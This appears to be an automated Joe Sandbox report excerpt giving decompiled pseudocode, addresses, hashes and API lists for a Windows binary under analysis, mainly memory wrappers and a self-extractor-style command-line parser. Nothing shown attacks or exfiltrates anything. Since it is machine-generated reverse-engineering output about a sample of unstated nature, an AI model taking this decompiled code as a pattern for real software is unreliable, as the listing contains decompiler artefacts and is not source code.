                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 4a882d498f73a73c30f3b3f7841c692236e43da224ee1421fee2580fde95b9fa
                                                                        • Instruction ID: f8394646367cd87c14a98acb2c54106737f66a7db714fdeb3e836cd0e731b044
                                                                        • Opcode Fuzzy Hash: 4a882d498f73a73c30f3b3f7841c692236e43da224ee1421fee2580fde95b9fa
                                                                        • Instruction Fuzzy Hash: C7B09276622484426A2016316C295A63841F6C123A7E41B91F032C01E0DA3EC846E204
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F84CA0(long _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00f84caa
                                                                        0x00f84cb1

                                                                        APIs
                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00F84CAA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: AllocGlobal
                                                                        • String ID:
                                                                        • API String ID: 3761449716-0
                                                                        • Opcode ID: d111df0f163a4943a9a33bd17f7f1068d309b910c6c0aaaba0c052e0c28cb58d
                                                                        • Instruction ID: 76b02aa4ffab6dc0fcd00c1c33d622c7b0d824558ee42fac5c8d1a0ba3af19f2
                                                                        • Opcode Fuzzy Hash: d111df0f163a4943a9a33bd17f7f1068d309b910c6c0aaaba0c052e0c28cb58d
                                                                        • Instruction Fuzzy Hash: 7DB0123214420CB7DF001FC2EC09FD53F1DE7C4761F240041F60C450508A7294109796
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F84CC0(void* _a4) {
                                                                        				void* _t2;
                                                                        
                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                        				return _t2;
                                                                        			}




                                                                        0x00f84cc8
                                                                        0x00f84ccf

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: 821e44d9dcacae2e35d4cd69b95fea99c3e0892e2bb25ab91cc93a2dcb048d54
                                                                        • Instruction ID: 4d5319bb4e46c9206b2b26146e1d0db56b6b5eaa1c9cfe98547632b1404dd396
                                                                        • Opcode Fuzzy Hash: 821e44d9dcacae2e35d4cd69b95fea99c3e0892e2bb25ab91cc93a2dcb048d54
                                                                        • Instruction Fuzzy Hash: 62B0123100010CB78F001B42EC088953F1DD6C02607000051F50C451218B3398119685
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00F85C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				CHAR* _v265;
                                                                        				char _v266;
                                                                        				char _v267;
                                                                        				char _v268;
                                                                        				CHAR* _v272;
                                                                        				char _v276;
                                                                        				signed int _v296;
                                                                        				char _v556;
                                                                        				signed int _t61;
                                                                        				int _t63;
                                                                        				char _t67;
                                                                        				CHAR* _t69;
                                                                        				signed int _t71;
                                                                        				void* _t75;
                                                                        				char _t79;
                                                                        				void* _t83;
                                                                        				void* _t85;
                                                                        				void* _t87;
                                                                        				intOrPtr _t88;
                                                                        				void* _t100;
                                                                        				intOrPtr _t101;
                                                                        				CHAR* _t104;
                                                                        				intOrPtr _t105;
                                                                        				void* _t111;
                                                                        				void* _t115;
                                                                        				CHAR* _t118;
                                                                        				void* _t119;
                                                                        				void* _t127;
                                                                        				CHAR* _t129;
                                                                        				void* _t132;
                                                                        				void* _t142;
                                                                        				signed int _t143;
                                                                        				CHAR* _t144;
                                                                        				void* _t145;
                                                                        				void* _t146;
                                                                        				void* _t147;
                                                                        				void* _t149;
                                                                        				char _t155;
                                                                        				void* _t157;
                                                                        				void* _t162;
                                                                        				void* _t163;
                                                                        				char _t167;
                                                                        				char _t170;
                                                                        				CHAR* _t173;
                                                                        				void* _t177;
                                                                        				intOrPtr* _t183;
                                                                        				intOrPtr* _t192;
                                                                        				CHAR* _t199;
                                                                        				void* _t200;
                                                                        				CHAR* _t201;
                                                                        				void* _t205;
                                                                        				void* _t206;
                                                                        				int _t209;
                                                                        				void* _t210;
                                                                        				void* _t212;
                                                                        				void* _t213;
                                                                        				CHAR* _t218;
                                                                        				intOrPtr* _t219;
                                                                        				intOrPtr* _t220;
                                                                        				signed int _t221;
                                                                        				signed int _t223;
                                                                        
                                                                        				_t173 = __ecx;
                                                                        				_t61 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t61 ^ _t221;
                                                                        				_push(__ebx);
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t209 = 1;
                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                        					_t63 = 1;
                                                                        				} else {
                                                                        					L2:
                                                                        					while(_t209 != 0) {
                                                                        						_t67 =  *_t173;
                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                        							_t173 = CharNextA(_t173);
                                                                        							continue;
                                                                        						}
                                                                        						_v272 = _t173;
                                                                        						if(_t67 == 0) {
                                                                        							break;
                                                                        						} else {
                                                                        							_t69 = _v272;
                                                                        							_t177 = 0;
                                                                        							_t213 = 0;
                                                                        							_t163 = 0;
                                                                        							_t202 = 1;
                                                                        							do {
                                                                        								if(_t213 != 0) {
                                                                        									if(_t163 != 0) {
                                                                        										break;
                                                                        									} else {
                                                                        										goto L21;
                                                                        									}
                                                                        								} else {
                                                                        									_t69 =  *_t69;
                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                        										break;
                                                                        									} else {
                                                                        										_t69 = _v272;
                                                                        										L21:
                                                                        										_t155 =  *_t69;
                                                                        										if(_t155 != 0x22) {
                                                                        											if(_t202 >= 0x104) {
                                                                        												goto L106;
                                                                        											} else {
                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                        												_t177 = _t177 + 1;
                                                                        												_t202 = _t202 + 1;
                                                                        												_t157 = 1;
                                                                        												goto L30;
                                                                        											}
                                                                        										} else {
                                                                        											if(_v272[1] == 0x22) {
                                                                        												if(_t202 >= 0x104) {
                                                                        													L106:
                                                                        													_t63 = 0;
                                                                        													L125:
                                                                        													_pop(_t210);
                                                                        													_pop(_t212);
                                                                        													_pop(_t162);
                                                                        													return E00F86CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                        												} else {
                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                        													_t177 = _t177 + 1;
                                                                        													_t202 = _t202 + 1;
                                                                        													_t157 = 2;
                                                                        													goto L30;
                                                                        												}
                                                                        											} else {
                                                                        												_t157 = 1;
                                                                        												if(_t213 != 0) {
                                                                        													_t163 = 1;
                                                                        												} else {
                                                                        													_t213 = 1;
                                                                        												}
                                                                        												goto L30;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        								goto L131;
                                                                        								L30:
                                                                        								_v272 =  &(_v272[_t157]);
                                                                        								_t69 = _v272;
                                                                        							} while ( *_t69 != 0);
                                                                        							if(_t177 >= 0x104) {
                                                                        								E00F86E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                        								asm("int3");
                                                                        								_push(_t221);
                                                                        								_t222 = _t223;
                                                                        								_t71 =  *0xf88004; // 0x7e92e7a6
                                                                        								_v296 = _t71 ^ _t223;
                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                        									0x4f0 = 2;
                                                                        									_t75 = E00F8597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                        								} else {
                                                                        									E00F844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                        									 *0xf89124 = E00F86285();
                                                                        									_t75 = 0;
                                                                        								}
                                                                        								return E00F86CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                        							} else {
                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                        								if(_t213 == 0) {
                                                                        									if(_t163 != 0) {
                                                                        										goto L34;
                                                                        									} else {
                                                                        										goto L40;
                                                                        									}
                                                                        								} else {
                                                                        									if(_t163 != 0) {
                                                                        										L40:
                                                                        										_t79 = _v268;
                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                        											if(_t83 == 0) {
                                                                        												_t202 = 0x521;
                                                                        												E00F844B9(0, 0x521, 0xf81140, 0, 0x40, 0);
                                                                        												_t85 =  *0xf88588; // 0x0
                                                                        												if(_t85 != 0) {
                                                                        													CloseHandle(_t85);
                                                                        												}
                                                                        												ExitProcess(0);
                                                                        											}
                                                                        											_t87 = _t83 - 4;
                                                                        											if(_t87 == 0) {
                                                                        												if(_v266 != 0) {
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t215 =  &_v268 + _t167;
                                                                        														_t183 =  &_v268 + _t167;
                                                                        														_t50 = _t183 + 1; // 0x1
                                                                        														_t202 = _t50;
                                                                        														do {
                                                                        															_t88 =  *_t183;
                                                                        															_t183 = _t183 + 1;
                                                                        														} while (_t88 != 0);
                                                                        														if(_t183 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t205 = 0x5b;
                                                                        															if(E00F8667F(_t215, _t205) == 0) {
                                                                        																L115:
                                                                        																_t206 = 0x5d;
                                                                        																if(E00F8667F(_t215, _t206) == 0) {
                                                                        																	L117:
                                                                        																	_t202 =  &_v276;
                                                                        																	_v276 = _t167;
                                                                        																	if(E00F85C17(_t215,  &_v276) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		_t202 = 0x104;
                                                                        																		E00F81680(0xf88c42, 0x104, _v276 + _t167 +  &_v268);
                                                                        																	}
                                                                        																} else {
                                                                        																	_t202 = 0x5b;
                                                                        																	if(E00F8667F(_t215, _t202) == 0) {
                                                                        																		goto L49;
                                                                        																	} else {
                                                                        																		goto L117;
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																_t202 = 0x5d;
                                                                        																if(E00F8667F(_t215, _t202) == 0) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	goto L115;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													 *0xf88a24 = 1;
                                                                        												}
                                                                        												goto L50;
                                                                        											} else {
                                                                        												_t100 = _t87 - 1;
                                                                        												if(_t100 == 0) {
                                                                        													L98:
                                                                        													if(_v266 != 0x3a) {
                                                                        														goto L49;
                                                                        													} else {
                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                        														_t217 =  &_v268 + _t170;
                                                                        														_t192 =  &_v268 + _t170;
                                                                        														_t38 = _t192 + 1; // 0x1
                                                                        														_t202 = _t38;
                                                                        														do {
                                                                        															_t101 =  *_t192;
                                                                        															_t192 = _t192 + 1;
                                                                        														} while (_t101 != 0);
                                                                        														if(_t192 == _t202) {
                                                                        															goto L49;
                                                                        														} else {
                                                                        															_t202 =  &_v276;
                                                                        															_v276 = _t170;
                                                                        															if(E00F85C17(_t217,  &_v276) == 0) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t104 = CharUpperA(_v267);
                                                                        																_t218 = 0xf88b3e;
                                                                        																_t105 = _v276;
                                                                        																if(_t104 != 0x54) {
                                                                        																	_t218 = 0xf88a3a;
                                                                        																}
                                                                        																E00F81680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                        																_t202 = 0x104;
                                                                        																E00F8658A(_t218, 0x104, 0xf81140);
                                                                        																if(E00F831E0(_t218) != 0) {
                                                                        																	goto L50;
                                                                        																} else {
                                                                        																	goto L106;
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												} else {
                                                                        													_t111 = _t100 - 0xa;
                                                                        													if(_t111 == 0) {
                                                                        														if(_v266 != 0) {
                                                                        															if(_v266 != 0x3a) {
                                                                        																goto L49;
                                                                        															} else {
                                                                        																_t199 = _v265;
                                                                        																if(_t199 != 0) {
                                                                        																	_t219 =  &_v265;
                                                                        																	do {
                                                                        																		_t219 = _t219 + 1;
                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                        																		if(_t115 == 0) {
                                                                        																			 *0xf88a2c = 1;
                                                                        																		} else {
                                                                        																			_t200 = 2;
                                                                        																			_t119 = _t115 - _t200;
                                                                        																			if(_t119 == 0) {
                                                                        																				 *0xf88a30 = 1;
                                                                        																			} else {
                                                                        																				if(_t119 == 0xf) {
                                                                        																					 *0xf88a34 = 1;
                                                                        																				} else {
                                                                        																					_t209 = 0;
                                                                        																				}
                                                                        																			}
                                                                        																		}
                                                                        																		_t118 =  *_t219;
                                                                        																		_t199 = _t118;
                                                                        																	} while (_t118 != 0);
                                                                        																}
                                                                        															}
                                                                        														} else {
                                                                        															 *0xf88a2c = 1;
                                                                        														}
                                                                        														goto L50;
                                                                        													} else {
                                                                        														_t127 = _t111 - 3;
                                                                        														if(_t127 == 0) {
                                                                        															if(_v266 != 0) {
                                                                        																if(_v266 != 0x3a) {
                                                                        																	goto L49;
                                                                        																} else {
                                                                        																	_t129 = CharUpperA(_v265);
                                                                        																	if(_t129 == 0x31) {
                                                                        																		goto L76;
                                                                        																	} else {
                                                                        																		if(_t129 == 0x41) {
                                                                        																			goto L83;
                                                                        																		} else {
                                                                        																			if(_t129 == 0x55) {
                                                                        																				goto L76;
                                                                        																			} else {
                                                                        																				goto L49;
                                                                        																			}
                                                                        																		}
                                                                        																	}
                                                                        																}
                                                                        															} else {
                                                                        																L76:
                                                                        																_push(2);
                                                                        																_pop(1);
                                                                        																L83:
                                                                        																 *0xf88a38 = 1;
                                                                        															}
                                                                        															goto L50;
                                                                        														} else {
                                                                        															_t132 = _t127 - 1;
                                                                        															if(_t132 == 0) {
                                                                        																if(_v266 != 0) {
                                                                        																	if(_v266 != 0x3a) {
                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                        																			goto L49;
                                                                        																		}
                                                                        																	} else {
                                                                        																		_t201 = _v265;
                                                                        																		 *0xf89a2c = 1;
                                                                        																		if(_t201 != 0) {
                                                                        																			_t220 =  &_v265;
                                                                        																			do {
                                                                        																				_t220 = _t220 + 1;
                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                        																				if(_t142 == 0) {
                                                                        																					_t143 = 2;
                                                                        																					 *0xf89a2c =  *0xf89a2c | _t143;
                                                                        																					goto L70;
                                                                        																				} else {
                                                                        																					_t145 = _t142 - 3;
                                                                        																					if(_t145 == 0) {
                                                                        																						 *0xf88d48 =  *0xf88d48 | 0x00000040;
                                                                        																					} else {
                                                                        																						_t146 = _t145 - 5;
                                                                        																						if(_t146 == 0) {
                                                                        																							 *0xf89a2c =  *0xf89a2c & 0xfffffffd;
                                                                        																							goto L70;
                                                                        																						} else {
                                                                        																							_t147 = _t146 - 5;
                                                                        																							if(_t147 == 0) {
                                                                        																								 *0xf89a2c =  *0xf89a2c & 0xfffffffe;
                                                                        																								goto L70;
                                                                        																							} else {
                                                                        																								_t149 = _t147;
                                                                        																								if(_t149 == 0) {
                                                                        																									 *0xf88d48 =  *0xf88d48 | 0x00000080;
                                                                        																								} else {
                                                                        																									if(_t149 == 3) {
                                                                        																										 *0xf89a2c =  *0xf89a2c | 0x00000004;
                                                                        																										L70:
                                                                        																										 *0xf88a28 = 1;
                                                                        																									} else {
                                                                        																										_t209 = 0;
                                                                        																									}
                                                                        																								}
                                                                        																							}
                                                                        																						}
                                                                        																					}
                                                                        																				}
                                                                        																				_t144 =  *_t220;
                                                                        																				_t201 = _t144;
                                                                        																			} while (_t144 != 0);
                                                                        																		}
                                                                        																	}
                                                                        																} else {
                                                                        																	 *0xf89a2c = 3;
                                                                        																	 *0xf88a28 = 1;
                                                                        																}
                                                                        																goto L50;
                                                                        															} else {
                                                                        																if(_t132 == 0) {
                                                                        																	goto L98;
                                                                        																} else {
                                                                        																	L49:
                                                                        																	_t209 = 0;
                                                                        																	L50:
                                                                        																	_t173 = _v272;
                                                                        																	if( *_t173 != 0) {
                                                                        																		goto L2;
                                                                        																	} else {
                                                                        																		break;
                                                                        																	}
                                                                        																}
                                                                        															}
                                                                        														}
                                                                        													}
                                                                        												}
                                                                        											}
                                                                        										} else {
                                                                        											goto L106;
                                                                        										}
                                                                        									} else {
                                                                        										L34:
                                                                        										_t209 = 0;
                                                                        										break;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L131;
                                                                        					}
                                                                        					if( *0xf88a2c != 0 &&  *0xf88b3e == 0) {
                                                                        						if(GetModuleFileNameA( *0xf89a3c, 0xf88b3e, 0x104) == 0) {
                                                                        							_t209 = 0;
                                                                        						} else {
                                                                        							_t202 = 0x5c;
                                                                        							 *((char*)(E00F866C8(0xf88b3e, _t202) + 1)) = 0;
                                                                        						}
                                                                        					}
                                                                        					_t63 = _t209;
                                                                        				}
                                                                        				L131:
                                                                        			}


































































                                                                        0x00f85c9e
                                                                        0x00f85ca9
                                                                        0x00f85cb0
                                                                        0x00f85cb3
                                                                        0x00f85cb6
                                                                        0x00f85cb7
                                                                        0x00f85cb8
                                                                        0x00f85cbd
                                                                        0x00f86204
                                                                        0x00f85ccb
                                                                        0x00000000
                                                                        0x00f85ccb
                                                                        0x00f85cd3
                                                                        0x00f85cd7
                                                                        0x00f85cf4
                                                                        0x00000000
                                                                        0x00f85cf4
                                                                        0x00f85cf8
                                                                        0x00f85d00
                                                                        0x00000000
                                                                        0x00f85d06
                                                                        0x00f85d06
                                                                        0x00f85d0e
                                                                        0x00f85d10
                                                                        0x00f85d12
                                                                        0x00f85d14
                                                                        0x00f85d15
                                                                        0x00f85d17
                                                                        0x00f85d49
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85d19
                                                                        0x00f85d19
                                                                        0x00f85d1d
                                                                        0x00000000
                                                                        0x00f85d3f
                                                                        0x00f85d3f
                                                                        0x00f85d4b
                                                                        0x00f85d4b
                                                                        0x00f85d4f
                                                                        0x00f85d8d
                                                                        0x00000000
                                                                        0x00f85d93
                                                                        0x00f85d93
                                                                        0x00f85d9a
                                                                        0x00f85d9d
                                                                        0x00f85d9e
                                                                        0x00000000
                                                                        0x00f85d9e
                                                                        0x00f85d51
                                                                        0x00f85d5b
                                                                        0x00f85d72
                                                                        0x00f860fb
                                                                        0x00f860fb
                                                                        0x00f86207
                                                                        0x00f8620a
                                                                        0x00f8620b
                                                                        0x00f8620e
                                                                        0x00f86217
                                                                        0x00f85d78
                                                                        0x00f85d78
                                                                        0x00f85d80
                                                                        0x00f85d83
                                                                        0x00f85d84
                                                                        0x00000000
                                                                        0x00f85d84
                                                                        0x00f85d5d
                                                                        0x00f85d5f
                                                                        0x00f85d62
                                                                        0x00f85d68
                                                                        0x00f85d64
                                                                        0x00f85d64
                                                                        0x00f85d64
                                                                        0x00000000
                                                                        0x00f85d62
                                                                        0x00f85d5b
                                                                        0x00f85d4f
                                                                        0x00f85d1d
                                                                        0x00000000
                                                                        0x00f85d9f
                                                                        0x00f85d9f
                                                                        0x00f85da5
                                                                        0x00f85dab
                                                                        0x00f85dba
                                                                        0x00f86218
                                                                        0x00f8621d
                                                                        0x00f86220
                                                                        0x00f86221
                                                                        0x00f86229
                                                                        0x00f86230
                                                                        0x00f86247
                                                                        0x00f8626a
                                                                        0x00f86272
                                                                        0x00f86249
                                                                        0x00f86255
                                                                        0x00f8625f
                                                                        0x00f86264
                                                                        0x00f86264
                                                                        0x00f86284
                                                                        0x00f85dc0
                                                                        0x00f85dc0
                                                                        0x00f85dca
                                                                        0x00f85e22
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85dcc
                                                                        0x00f85dce
                                                                        0x00f85e24
                                                                        0x00f85e24
                                                                        0x00f85e2c
                                                                        0x00f85e47
                                                                        0x00f85e4a
                                                                        0x00f861d2
                                                                        0x00f861e2
                                                                        0x00f861e7
                                                                        0x00f861ee
                                                                        0x00f861f1
                                                                        0x00f861f1
                                                                        0x00f861f8
                                                                        0x00f861f8
                                                                        0x00f85e50
                                                                        0x00f85e53
                                                                        0x00f86109
                                                                        0x00f8611f
                                                                        0x00000000
                                                                        0x00f86125
                                                                        0x00f86137
                                                                        0x00f8613a
                                                                        0x00f8613c
                                                                        0x00f8613e
                                                                        0x00f8613e
                                                                        0x00f86141
                                                                        0x00f86141
                                                                        0x00f86143
                                                                        0x00f86144
                                                                        0x00f8614a
                                                                        0x00000000
                                                                        0x00f86150
                                                                        0x00f86152
                                                                        0x00f8615c
                                                                        0x00f86170
                                                                        0x00f86172
                                                                        0x00f8617c
                                                                        0x00f86190
                                                                        0x00f86190
                                                                        0x00f86196
                                                                        0x00f861a5
                                                                        0x00000000
                                                                        0x00f861ab
                                                                        0x00f861b9
                                                                        0x00f861c6
                                                                        0x00f861c6
                                                                        0x00f8617e
                                                                        0x00f86180
                                                                        0x00f8618a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8618a
                                                                        0x00f8615e
                                                                        0x00f86160
                                                                        0x00f8616a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8616a
                                                                        0x00f8615c
                                                                        0x00f8614a
                                                                        0x00f8610b
                                                                        0x00f8610e
                                                                        0x00f8610e
                                                                        0x00000000
                                                                        0x00f85e59
                                                                        0x00f85e59
                                                                        0x00f85e5c
                                                                        0x00f8604f
                                                                        0x00f86056
                                                                        0x00000000
                                                                        0x00f8605c
                                                                        0x00f8606e
                                                                        0x00f86071
                                                                        0x00f86073
                                                                        0x00f86075
                                                                        0x00f86075
                                                                        0x00f86078
                                                                        0x00f86078
                                                                        0x00f8607a
                                                                        0x00f8607b
                                                                        0x00f86081
                                                                        0x00000000
                                                                        0x00f86087
                                                                        0x00f86087
                                                                        0x00f8608d
                                                                        0x00f8609c
                                                                        0x00000000
                                                                        0x00f860a2
                                                                        0x00f860aa
                                                                        0x00f860b2
                                                                        0x00f860b7
                                                                        0x00f860bd
                                                                        0x00f860bf
                                                                        0x00f860bf
                                                                        0x00f860d6
                                                                        0x00f860e0
                                                                        0x00f860e7
                                                                        0x00f860f5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f860f5
                                                                        0x00f8609c
                                                                        0x00f86081
                                                                        0x00f85e62
                                                                        0x00f85e62
                                                                        0x00f85e65
                                                                        0x00f85fd3
                                                                        0x00f85fe9
                                                                        0x00000000
                                                                        0x00f85fef
                                                                        0x00f85fef
                                                                        0x00f85ff7
                                                                        0x00f85ffd
                                                                        0x00f86003
                                                                        0x00f86006
                                                                        0x00f86011
                                                                        0x00f86014
                                                                        0x00f8603d
                                                                        0x00f86016
                                                                        0x00f86018
                                                                        0x00f86019
                                                                        0x00f8601b
                                                                        0x00f86033
                                                                        0x00f8601d
                                                                        0x00f86020
                                                                        0x00f86029
                                                                        0x00f86022
                                                                        0x00f86022
                                                                        0x00f86022
                                                                        0x00f86020
                                                                        0x00f8601b
                                                                        0x00f86042
                                                                        0x00f86044
                                                                        0x00f86046
                                                                        0x00f8604a
                                                                        0x00f85ff7
                                                                        0x00f85fd5
                                                                        0x00f85fd8
                                                                        0x00f85fd8
                                                                        0x00000000
                                                                        0x00f85e6b
                                                                        0x00f85e6b
                                                                        0x00f85e6e
                                                                        0x00f85f8b
                                                                        0x00f85f99
                                                                        0x00000000
                                                                        0x00f85f9f
                                                                        0x00f85fa7
                                                                        0x00f85faf
                                                                        0x00000000
                                                                        0x00f85fb1
                                                                        0x00f85fb3
                                                                        0x00000000
                                                                        0x00f85fb5
                                                                        0x00f85fb7
                                                                        0x00000000
                                                                        0x00f85fb9
                                                                        0x00000000
                                                                        0x00f85fb9
                                                                        0x00f85fb7
                                                                        0x00f85fb3
                                                                        0x00f85faf
                                                                        0x00f85f8d
                                                                        0x00f85f8d
                                                                        0x00f85f8d
                                                                        0x00f85f8f
                                                                        0x00f85fc1
                                                                        0x00f85fc1
                                                                        0x00f85fc1
                                                                        0x00000000
                                                                        0x00f85e74
                                                                        0x00f85e74
                                                                        0x00f85e77
                                                                        0x00f85ea0
                                                                        0x00f85ebd
                                                                        0x00f85f79
                                                                        0x00000000
                                                                        0x00f85f7f
                                                                        0x00f85ec3
                                                                        0x00f85ec3
                                                                        0x00f85ecc
                                                                        0x00f85ed4
                                                                        0x00f85ed6
                                                                        0x00f85edc
                                                                        0x00f85edf
                                                                        0x00f85eea
                                                                        0x00f85eed
                                                                        0x00f85f3f
                                                                        0x00f85f40
                                                                        0x00000000
                                                                        0x00f85eef
                                                                        0x00f85eef
                                                                        0x00f85ef2
                                                                        0x00f85f34
                                                                        0x00f85ef4
                                                                        0x00f85ef4
                                                                        0x00f85ef7
                                                                        0x00f85f2b
                                                                        0x00000000
                                                                        0x00f85ef9
                                                                        0x00f85ef9
                                                                        0x00f85efc
                                                                        0x00f85f22
                                                                        0x00000000
                                                                        0x00f85efe
                                                                        0x00f85eff
                                                                        0x00f85f02
                                                                        0x00f85f16
                                                                        0x00f85f04
                                                                        0x00f85f07
                                                                        0x00f85f0d
                                                                        0x00f85f46
                                                                        0x00f85f46
                                                                        0x00f85f09
                                                                        0x00f85f09
                                                                        0x00f85f09
                                                                        0x00f85f07
                                                                        0x00f85f02
                                                                        0x00f85efc
                                                                        0x00f85ef7
                                                                        0x00f85ef2
                                                                        0x00f85f4c
                                                                        0x00f85f4e
                                                                        0x00f85f50
                                                                        0x00f85f54
                                                                        0x00f85ed4
                                                                        0x00f85ea2
                                                                        0x00f85ea4
                                                                        0x00f85eaf
                                                                        0x00f85eaf
                                                                        0x00000000
                                                                        0x00f85e79
                                                                        0x00f85e7d
                                                                        0x00000000
                                                                        0x00f85e83
                                                                        0x00f85e83
                                                                        0x00f85e83
                                                                        0x00f85e85
                                                                        0x00f85e85
                                                                        0x00f85e8e
                                                                        0x00000000
                                                                        0x00f85e94
                                                                        0x00000000
                                                                        0x00f85e94
                                                                        0x00f85e8e
                                                                        0x00f85e7d
                                                                        0x00f85e77
                                                                        0x00f85e6e
                                                                        0x00f85e65
                                                                        0x00f85e5c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f85dd0
                                                                        0x00f85dd0
                                                                        0x00f85dd0
                                                                        0x00000000
                                                                        0x00f85dd0
                                                                        0x00f85dce
                                                                        0x00f85dca
                                                                        0x00f85dba
                                                                        0x00000000
                                                                        0x00f85d00
                                                                        0x00f85dd9
                                                                        0x00f85e04
                                                                        0x00f861fe
                                                                        0x00f85e0a
                                                                        0x00f85e0c
                                                                        0x00f85e17
                                                                        0x00f85e17
                                                                        0x00f85e04
                                                                        0x00f86200
                                                                        0x00f86200
                                                                        0x00000000

                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00F85CEE
                                                                        • GetModuleFileNameA.KERNEL32(00F88B3E,00000104,00000000,?,?), ref: 00F85DFC
                                                                        • CharUpperA.USER32(?), ref: 00F85E3E
                                                                        • CharUpperA.USER32(-00000052), ref: 00F85EE1
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00F85F6F
                                                                        • CharUpperA.USER32(?), ref: 00F85FA7
                                                                        • CharUpperA.USER32(-0000004E), ref: 00F86008
                                                                        • CharUpperA.USER32(?), ref: 00F860AA
                                                                        • CloseHandle.KERNEL32(00000000,00F81140,00000000,00000040,00000000), ref: 00F861F1
                                                                        • ExitProcess.KERNEL32 ref: 00F861F8
                                                                        Strings
                                                                        Memory Dump Source
